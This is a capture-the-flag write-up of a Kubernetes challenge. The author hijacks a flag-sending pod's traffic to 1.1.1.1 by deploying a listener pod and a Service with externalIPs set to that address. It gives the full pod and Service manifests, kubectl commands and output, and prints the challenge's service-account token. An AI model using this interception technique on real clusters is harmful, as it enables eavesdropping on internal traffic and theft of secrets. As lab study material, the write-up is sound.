Hungry Helmsman is a challenge I had the opportunity to solve during Potluck CTF 2023, which took place at the 37th Chaos Communication Congress (37C3). It's a Kubernetes challenge in which we are initially given a kubeconfig with credentials. With these credentials, we can deploy a malicious pod that abuses the weak isolation between namespaces to retrieve the flag.
Solution:
To retrieve the configuration, you must first connect to the challenge server:
rayanlecat@potluck2023 /workspace # nc challenge10.play.potluckctf.com 8888
[ASCII-art "potluckctf" banner]
Challenge: Hungry Helmsman
Creating Cluster
Waiting for control plane..........................................
Here is your Kubeconfig:
apiVersion: v1
clusters:
- cluster:
server: https://flux-cluster-74ca68cd8370436984e2dd80c3601e28.challenge10.play.potluckctf.com
name: ctf-cluster
contexts:
- context:
cluster: ctf-cluster
user: ctf-player
name: ctf-cluster
current-context: ctf-cluster
kind: Config
preferences: {}
users:
- name: ctf-player
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6Ild6S0RQYTNfQWpsV1BtRnIyZmo1NS1SZEJST1lnM2JqYWRScF9PQWhwdjQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzAzODU2NDc2LCJpYXQiOjE3MDM4NTI4NzYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImN0Zi1wbGF5ZXIiLCJ1aWQiOiJmMjY1NTE3Yy1jZjM1LTQwNzAtYTkwOS0zYWI4NjNmNWJlMjIifX0sIm5iZiI6MTcwMzg1Mjg3Niwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6Y3RmLXBsYXllciJ9.oTSHy_oVpwSfdOrOKCpsZgQgIRk1Fa-QdCoB3KqBRiX-WtQWgcgLlKGUbT4405CnDc60A4c79lkDjwQbX3s4EUT3Zw7CZSFrpcZM1VBwAzsK1eRTRafrSoTbeYt6vp_80jNVVNyEN2HpECyxQbguMmmU65tTvGupKQq_ZWjH0Z3NhRTIXbBgTVESFxjoMQNA4NRQ1AzHHUzqisVMUgIyKtvT00sZhwDLiqf0UNTHwDX56-j5tBNFIBB4gePB4S5PPiBt1ebGpR6GQXYtnTL3SLtLJNg_f-1Qyr3Hb_htGQGf90TekbtaHzC6jDfJzXl5JR6pYAcXWdZmpl8V4V2uUw
Once you have retrieved the Kubernetes configuration, you can check that kubectl reads it correctly:
rayanlecat@potluck2023 /workspace # kubectl config --kubeconfig config view
apiVersion: v1
clusters:
- cluster:
server: https://flux-cluster-74ca68cd8370436984e2dd80c3601e28.challenge10.play.potluckctf.com
name: ctf-cluster
contexts:
- context:
cluster: ctf-cluster
user: ctf-player
name: ctf-cluster
current-context: ctf-cluster
kind: Config
preferences: {}
users:
- name: ctf-player
user:
token: REDACTED
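For convenience, we can point kubectl at this file once so that the following commands don't need the --kubeconfig flag each time (a small optional step, assuming the kubeconfig was saved as a file named config in the current directory, as in the command above):

export KUBECONFIG=$PWD/config
kubectl config current-context   # should print ctf-cluster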
First, I'll list the namespaces that exist in the Kubernetes cluster:
rayanlecat@potluck2023 /workspace # kubectl get namespace
NAME STATUS AGE
default Active 99s
flag-reciever Active 93s
flag-sender Active 93s
kube-node-lease Active 99s
kube-public Active 99s
kube-system Active 99s
In the challenge cluster we see two interesting namespaces:
– flag-reciever
– flag-sender
We’ll now list the resources present in these two namespaces, including the pods:
rayanlecat@potluck2023 /workspace # kubectl get pods --namespace=flag-sender
NAME READY STATUS RESTARTS AGE
flag-sender-676776d678-2g8vm 1/1 Running 0 8m12s
rayanlecat@potluck2023 /workspace # kubectl get pods --namespace=flag-reciever
No resources found in flag-reciever namespace.
Only the flag-sender namespace contains a pod, so let's retrieve some information about it:
rayanlecat@potluck2023 /workspace # kubectl describe pods/flag-sender-676776d678-5s6t5 --namespace=flag-sender
Name: flag-sender-676776d678-5s6t5
Namespace: flag-sender
...[snip]...
Command:
sh
Args:
-c
while true; do echo $FLAG | nc 1.1.1.1 80 || continue; echo 'Flag Send'; sleep 10; done
...[snip]...
We can see that every 10 seconds the pod connects to port 80 of 1.1.1.1 (Cloudflare's public DNS resolver) and sends the flag. The problem is that we control neither that machine nor the container running in this pod, so the question becomes: how do we impersonate the IP address 1.1.1.1 in order to receive the flag? To answer this, we need to keep enumerating the cluster and our rights within it:
rayanlecat@potluck2023 /workspace # kubectl auth can-i --list --namespace=flag-reciever
Resources Non-Resource URLs Resource Names Verbs
pods.* [] [] [create delete]
services.* [] [] [create delete]
...[snip]...
As we can see, we are allowed to create and delete pods and services in the flag-reciever namespace. Let's try deploying a pod to check that it works properly:
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  namespace: flag-reciever
spec:
  containers:
  - name: evil-container
    image: busybox
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
Error from server (Forbidden): error when creating "pod.yml": pods "evil-pod" is forbidden: violates PodSecurity "restricted:latest":
allowPrivilegeEscalation != false (container "evil-container" must set securityContext.allowPrivilegeEscalation=false),
unrestricted capabilities (container "evil-container" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "evil-container" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "evil-container" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")
We hit a first problem when trying to deploy the pod: it violates the namespace's restricted Pod Security policy, so we need a pod spec that satisfies these requirements:
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  namespace: flag-reciever
spec:
  containers:
  - name: evil-container
    image: busybox
    securityContext:
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      runAsUser: 1000
      capabilities:
        drop:
        - ALL
      seccompProfile:
        type: RuntimeDefault
Now we have a second problem: when we deploy the pod, we are told that our container must specify CPU and memory requests and limits to satisfy the namespace's resource quota:
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
Error from server (Forbidden): error when creating "pod.yml": pods "evil-pod" is forbidden: failed quota: flag-reciever: must specify limits.cpu for: evil-container; limits.memory for: evil-container; requests.cpu for: evil-container; requests.memory for: evil-container
First, we will retrieve the value of these quotas in order to modify the configuration of our pod:
rayanlecat@potluck2023 /workspace # kubectl describe quota --namespace=flag-reciever
Name: flag-reciever
Namespace: flag-reciever
Resource Used Hard
-------- ---- ----
limits.cpu 0 200m
limits.memory 0 100M
requests.cpu 0 100m
requests.memory 0 50M
With these values we can size our container to fit within the quota, and this time the pod deploys successfully:
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  namespace: flag-reciever
spec:
  containers:
  - name: evil-container
    image: busybox
    resources:
      requests:
        memory: "50M"
        cpu: "50m"
      limits:
        memory: "100M"
        cpu: "200m"
    securityContext:
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      runAsUser: 1000
      capabilities:
        drop:
        - ALL
      seccompProfile:
        type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
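Before going further, we can take a quick look at the pod's status (output omitted here; since this busybox container has no long-running command yet, don't be surprised if it shows Completed rather than Running, as the point so far was only to get past admission):

kubectl get pods --namespace=flag-reciever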
The question now is how a pod in the flag-sender namespace can be made to communicate with a pod in the flag-reciever namespace. To answer it, let's take a look at the NetworkPolicies:
rayanlecat@potluck2023 /workspace # kubectl get networkpolicies --namespace=flag-reciever
NAME POD-SELECTOR AGE
flag-reciever <none> 17m
rayanlecat@potluck2023 /workspace # kubectl describe networkpolicies --namespace flag-reciever
Name: flag-reciever
Namespace: flag-reciever
Created on: 2023-12-29 15:50:55 +0100 CET
Labels: <none>
Annotations: <none>
Spec:
PodSelector: <none> (Allowing the specific traffic to all pods in this namespace)
Allowing ingress traffic:
To Port: <any> (traffic allowed to all ports)
From:
NamespaceSelector: ns=flag-sender
PodSelector: app=flag-sender
Allowing egress traffic:
<none> (Selected pods are isolated for egress connectivity)
Policy Types: Ingress, Egress
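For readers who prefer raw manifests, here is a plausible YAML reconstruction of that NetworkPolicy, inferred purely from the describe output above (we cannot read the actual manifest, so the field layout and label values are assumptions):

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: flag-reciever
  namespace: flag-reciever
spec:
  podSelector: {}            # applies to every pod in flag-reciever
  policyTypes:
  - Ingress
  - Egress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          ns: flag-sender    # inferred from "NamespaceSelector: ns=flag-sender"
      podSelector:
        matchLabels:
          app: flag-sender   # inferred from "PodSelector: app=flag-sender"
  # no egress rules are defined, so selected pods are isolated for egress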
We can see that a rule authorizes all ingress traffic from the flag-sender application in the flag-sender namespace to every pod in the flag-reciever namespace. So if I manage to create a Service with externalIP 1.1.1.1 that exposes port 80 and forwards it to the container of a pod I control, I should be able to receive the flag. To do this, the first step is to open a listening port in a pod:
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  namespace: flag-reciever
spec:
  containers:
  - name: evil-container
    image: busybox
    ports:
    - containerPort: 80
    args: ["sh", "-c", "while true; do nc -l -v -p 80; done"]
    resources:
      requests:
        memory: "50M"
        cpu: "50m"
      limits:
        memory: "100M"
        cpu: "200m"
    securityContext:
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      runAsUser: 1000
      capabilities:
        drop:
        - ALL
      seccompProfile:
        type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
rayanlecat@potluck2023 /workspace # kubectl logs -f evil-pod --namespace=flag-reciever
nc: bind: Permission denied
The problem here is that, to respect the Pod Security policy, our container must not run as root, which means we cannot bind port 80 since it is a privileged port. To work around this, we can listen on an unprivileged port instead:
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  namespace: flag-reciever
spec:
  containers:
  - name: evil-container
    image: busybox
    ports:
    - containerPort: 1337
    args: ["sh", "-c", "while true; do nc -l -v -p 1337; done"]
    resources:
      requests:
        memory: "50M"
        cpu: "50m"
      limits:
        memory: "100M"
        cpu: "200m"
    securityContext:
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      runAsUser: 1000
      capabilities:
        drop:
        - ALL
      seccompProfile:
        type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
rayanlecat@potluck2023 /workspace # kubectl logs -f evil-pod --namespace=flag-reciever
listening on [::]:1337 ...
We can now listen on port 1337, but we still need to create the associated Service that exposes this port as port 80 on IP 1.1.1.1 in order to receive the flag. Don't forget to give the pod a label, otherwise the Service's selector cannot match it (perhaps there is a way to select a pod directly without labeling it, but I haven't found one):
rayanlecat@potluck2023 /workspace # cat service.yml
apiVersion: v1
kind: Service
metadata:
  name: evil-service
  namespace: flag-reciever
spec:
  selector:
    app: evil-receiver
  ports:
  - protocol: TCP
    port: 80
    targetPort: 1337
  externalIPs:
  - 1.1.1.1
rayanlecat@potluck2023 /workspace # cat pod.yml
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
  namespace: flag-reciever
  labels:
    app: evil-receiver
spec:
  containers:
  - name: evil-container
    image: busybox
    ports:
    - containerPort: 1337
    args: ["sh", "-c", "while true; do nc -l -v -p 1337; done"]
    resources:
      requests:
        memory: "50M"
        cpu: "50m"
      limits:
        memory: "100M"
        cpu: "200m"
    securityContext:
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      runAsUser: 1000
      capabilities:
        drop:
        - ALL
      seccompProfile:
        type: RuntimeDefault
rayanlecat@potluck2023 /workspace # kubectl apply -f pod.yml --namespace=flag-reciever
pod/evil-pod created
rayanlecat@potluck2023 /workspace # kubectl apply -f service.yml --namespace=flag-reciever
service/evil-service created
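Optionally, before looking at the logs, we can check that the Service's selector actually matched our pod and that the external IP was accepted (output omitted here; the ENDPOINTS column should list the pod's IP on port 1337 and the EXTERNAL-IP column should show 1.1.1.1):

kubectl get endpoints evil-service --namespace=flag-reciever
kubectl get service evil-service --namespace=flag-reciever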
We've successfully deployed our pod and our service. Finally, looking at our pod's logs, we can see that we've received the flag:
rayanlecat@potluck2023 /workspace # kubectl logs -f evil-pod --namespace=flag-reciever
listening on [::]:1337 ...
connect to [::ffff:192.168.20.6]:1337 from (null) ([::ffff:192.168.20.0]:7004)
potluck{kubernetes_can_be_a_bit_weird}
Flag: potluck{kubernetes_can_be_a_bit_weird}
Conclusion:
I found the challenge rather pleasant, even if it wasn't very hard. In the context of a CTF that only lasted 24 hours, with a mass of other challenges alongside it, a small challenge like this is always a pleasure, especially when it involves a technology like Kubernetes, which you don't come across very often in CTFs.
I’d also like to congratulate Calle Svensson, who single-handedly organized the CTF and ensured it ran smoothly throughout the event.
And of course, thanks to The Flat Network Society for allowing me to take part in the CTF with them, and to all those who were part of the team, it was really cool!
Resources:
- https://www.synacktiv.com/en/publications/kubernetes-namespaces-isolation-what-it-is-what-it-isnt-life-universe-and-everything
- https://kubernetes.io/docs/reference/kubectl/
- https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/
- https://github.com/DataDog/KubeHound
Originally published by BOUYAICHE RAYAN: 37C3 Potluck CTF – Hungry Helmsman